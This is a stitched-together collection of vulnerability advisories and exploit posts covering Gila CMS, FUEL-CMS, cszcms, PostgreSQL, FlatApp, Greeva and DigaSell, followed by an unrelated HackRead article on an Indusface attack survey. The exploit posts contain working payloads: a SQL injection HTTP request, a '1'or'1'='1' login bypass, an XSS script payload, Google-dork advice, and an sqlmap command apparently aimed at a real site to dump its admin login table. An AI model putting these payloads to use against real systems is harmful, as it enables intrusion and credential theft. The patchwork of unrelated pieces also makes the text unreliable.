Cross Site Scripting (XSS) vulnerability in adm_user parameter in Gila CMS version 1.11.3, allows remote attackers to execute arbitrary code during the Gila CMS installation.

**XSS on Gila CMS Installation**

**Gila CMS version 1.11.3**

1: Admin Username

<input name="adm_user" placeholder="Your Name" required="">

adm\_user

/install/install.sql.php

    $_user=$_POST['adm_user'];
    $_email=$_POST['adm_email'];
    $_pass=password_hash($_POST['adm_pass'], PASSWORD_BCRYPT);
    
    $link->query("INSERT INTO userrole(id,userrole) VALUES(1,'Admin');");
    $link->query("INSERT INTO user(id,username,email,pass,active,reset_code) VALUES(1,'$_user','$_email','$_pass',1,'');");
    

2:Login in admin pane

XSS

Visit the website

3:Reference

https://www.owasp.org/index.php/Cross-site\_Scripting\_(XSS)

CVE-2020-20523: XSS on Gila CMS Installation · Issue #41 · GilaCMS/gila

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

CVE-2020-27449: Release Notes - ManageEngine Password Manager Pro

SQL Injection vulnerability in file Base_module_model.php in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the col parameter to function list_items.

Parameter Name:col  
Parameter Type: GET  
Attack Pattern: extractvalue(1,concat(char(126),(select/\*\*/current\_user())))

    GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1/fuel/pages
    Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D

CVE-2020-24950: Vulnerability -  SQL Injection · Issue #562 · daylightstudio/FUEL-CMS

SQL Injection vulnerability in cskaza cszcms version 1.2.9, allows attackers to gain sensitive information via pm_sendmail parameter in csz_model.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-36136: Bug Report: SQL injection vulnerability · Issue #26 · cskaza/cszcms

IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.

**CVE-2023-39417****Extension script @substitutions@ within quoting allow SQL injection**

An extension script is vulnerable if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). No bundled extension is vulnerable. Vulnerable uses do appear in a documentation example and in non-bundled extensions. Hence, the attack prerequisite is an administrator having installed files of a vulnerable, trusted, non-bundled extension. Subject to that prerequisite, this enables an attacker having database-level CREATE privilege to execute arbitrary code as the bootstrap superuser. PostgreSQL will block this attack in the core server, so there's no need to modify individual extensions.

The PostgreSQL project thanks Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg for reporting this problem.

**Version Information**

Affected Version

Fixed In

Fix Published

15

15.4

2023-08-10

14

14.9

2023-08-10

13

13.12

2023-08-10

12

12.16

2023-08-10

11

11.21

2023-08-10

For more information about PostgreSQL versioning, please visit the versioning page.

**CVSS 3.0**

Overall Score

**7.5**

Component

core server

Vector

AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Reporting Security Vulnerabilities**

If you wish to report a new security vulnerability in PostgreSQL, please send an email to security@postgresql.org.

For reporting non-security bugs, please see the Report a Bug page.

CVE-2023-39417: Extension script @substitutions@ within quoting allow SQL injection

A vulnerability was found in PostgreSQL with the use of the MERGE command, which fails to test new rows against row security policies defined for UPDATE and SELECT. If UPDATE and SELECT policies forbid some rows that INSERT policies do not forbid, a user could store such rows.

CVE-2023-39418

FlatApp Premium Admin Dashboard version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /business-detail.php?lid=15003 <===== inject here [+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_loginGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

FlatApp Premium Admin Dashboard 1.0 SQL Injection

Greeva version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Greeva 2.0 Auth By Pass Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://coderthemes.com/greeva/index.html                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pas = 1'or'1'='1[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Greeva 2.0 SQL Injection

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

By Waqas
The new study has identified a cybersecurity training gap and an alarming lack of preparedness in countering emerging threats.
This is a post from HackRead.com Read the original post: Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study

*   **Sector Vulnerabilities:** Indusface’s research reveals that the Education sector is the most susceptible to cyber attacks, with a staggering 78% of businesses in this domain having experienced such threats.

*   **Email Hacking Dominates:** Email hacking emerged as the most common form of cyber attack, affecting 64% of respondents across various industries, necessitating enhanced training and defences against phishing and related tactics.

*   **Financial Services Resilience:** In contrast, the Financial Services sector demonstrated stronger cyber resilience, with only 26% reporting cyber attacks, potentially due to robust cybersecurity investment and training.

*   **Training Deficits:** The study highlights a concerning lack of employee training in cyber security across various sectors, with 83% of Education sector businesses neglecting this crucial aspect.

*   **Expert Insights:** Venky Sundar, Indusface’s Founder and President, underscores the diverse methods cyber attackers employ and emphasizes the importance of proactive employee training, security assessments, and Web Application and API Protection (WAAP) solutions.

A study conducted by Indusface in July 2023 and recently shared with Hackread.com delved deep into the state of cybersecurity, unearthing insights into the sectors most targeted by cyber attacks and shedding light on the prevailing types of cyber assaults faced by enterprises. Here’s what the company found:

**The Perilous Terrain: A Sector-Wise Analysis**

Indusface embarked on an extensive investigation, surveying 2,200 respondents across 16 diverse industries, to unveil the contours of cyber attacks on businesses. The results showcased an alarming reality – nearly half (49%) of UK businesses had fallen victim to a cyber attack. Such statistics underscored the pressing need for robust cybersecurity strategies in the corporate world.

**Education: The Bullseye of Cyber Attacks**

Within this backdrop, the Education sector emerged as the most besieged by cyber threats, with a staggering 78% of businesses revealing that they had experienced an attack. This revelation demands attention, particularly when coupled with the fact that a significant 83% of organizations within the Education sector were found to lack proactive employee training in cybersecurity – a vulnerability that cybercriminals can exploit.

**Arts, Entertainment, and Recreation: Second in Line**

Coming in second place, the Arts, Entertainment, and Recreation sector encountered cyber attacks at a rate of 68%. Disturbingly, over 30% of businesses in this sector were not actively training their personnel in cybersecurity protocols. This lack of preparation exposes these businesses to a range of attacks, including the ever-pervasive threat of email hacking.

**The Email Hacking Conundrum**

Indeed, email hacking stood tall as the most prevalent form of cyber attack, affecting a significant 64% of respondents from various business domains. This emphasizes the necessity for bolstered training in email security, encompassing a comprehensive approach to thwart phishing attempts, account takeovers, and credential stuffing.

**Navigating the Dangers: Financial Services Bypassed**

Contrasting the widespread cyber attacks on various sectors, the Financial Services industry exhibited resilience, reporting a lower incidence rate of 26%. This positive outcome was possibly influenced by the sector’s commitment to cybersecurity investment and training. It is evident that proactive measures play a pivotal role in safeguarding businesses from cyber threats.

**Expert Insights: Securing the Future**

Venky Sundar, Founder and President of Indusface, elucidated the significance of cybersecurity investment across all sectors. He highlighted that while email hacking remains a prevalent threat, the methods used are diverse, ranging from phishing to sophisticated attacks like SQL injection vulnerabilities.

Sundar emphasized the importance of training employees against phishing attacks, coupled with the implementation of robust security assessments and Web Application and API Protection (WAAP) solutions.

**A Call to Action**

As cyber threats continue to evolve in sophistication and impact, businesses must heed the findings of this research. Implementing comprehensive cybersecurity strategies, investing in training programs, and staying updated with the latest security solutions are imperatives that transcend industry boundaries.

In conclusion, the Indusface study serves as a clarion call to businesses to fortify their cyber defences. The relentless march of technology necessitates a united front against cybercriminals. With the insights gained from this research, businesses can navigate the complex landscape of cyber threats with resilience and vigilance.

**RELATED ARTICLES**

1.  AI Flagged as “Chronic Risk” in UK Gov Risk Register 2023
2.  SSH Remains Most Targeted Service in Cado’s Threat Report
3.  Russian Dark Net Markets Dominate the Global Illicit Drug Trade
4.  Submarine Cables Face Escalating Cybersecurity Threats, Report
5.  US, India, China Most Targeted in DDoS Attacks, StormWall Report

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#sql